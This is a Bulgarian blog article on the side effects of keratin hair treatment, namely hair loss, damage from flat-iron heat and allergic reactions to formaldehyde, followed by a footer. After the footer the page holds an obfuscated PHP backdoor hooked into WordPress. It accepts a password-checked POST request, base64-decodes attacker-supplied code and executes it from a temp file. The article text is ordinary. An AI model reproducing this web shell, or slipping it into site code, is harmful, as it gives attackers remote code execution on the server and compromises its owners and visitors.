Странични ефекти от третирането с кератин | Косопад

Странични ефекти от третирането с кератин

kosa-keratin

Третирането с кератин крие някои нежелани странични ефекти, които не са особено популярни. Но са реалност.

Третирането с кератин се състои в нанасяне на продукта върху мокра коса и изсушаването й със сешоар. Продуктът трябва да проникне за 20 минути, след което се използва преса за коса, за да може да влезе и в косъма. Подобни химически продукти променят структурата на косъма, като го правят по- мек, изправят го. В същото време кератинът прави косата силна и я подхранва.

Има обаче и нежелани странични ефекти. Някои от тях не се дължат точно на кератина, а на уредите, които се използват. Нека ги разгледаме:

keratin

Косопад

Много хора се оплакват от значително увеличаване на косопада, точно след като са се третирали с кератин. Косата става видимо по- тънка, а в някои крайни случаи се появяват и оплешивели зони. Според повечето специалисти, причината е високата температура на пресата за коса, което води до увреждане на фоликулите. Изправената коса изглежда с по- малък обем и по- тънка.

Увреждане на косата

Третирането с кератин прави косата блестяща и да изглежда страхотно, но след това косата изглежда суха и увредена след няколко миения. Третирането може да увреди косата, особено заради високата температура на пресата. След 6- 8 месеца много хора се оплакват, че косата им изглежда зле и се къса много лесно.

Алергична реакция

Обикновено се казва, че е натурален продукт, но истината е, че съдържа формалдехиди и други подобни вещества. Може да причини симптоми като суха кожа и сърбежи, дерматит и екзема. Ако сте склонни към алергия или чувствителна кожа, се консултирайте с дерматолог, преди да се подложите на процедурата.

25. август 2015 16:17:25 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}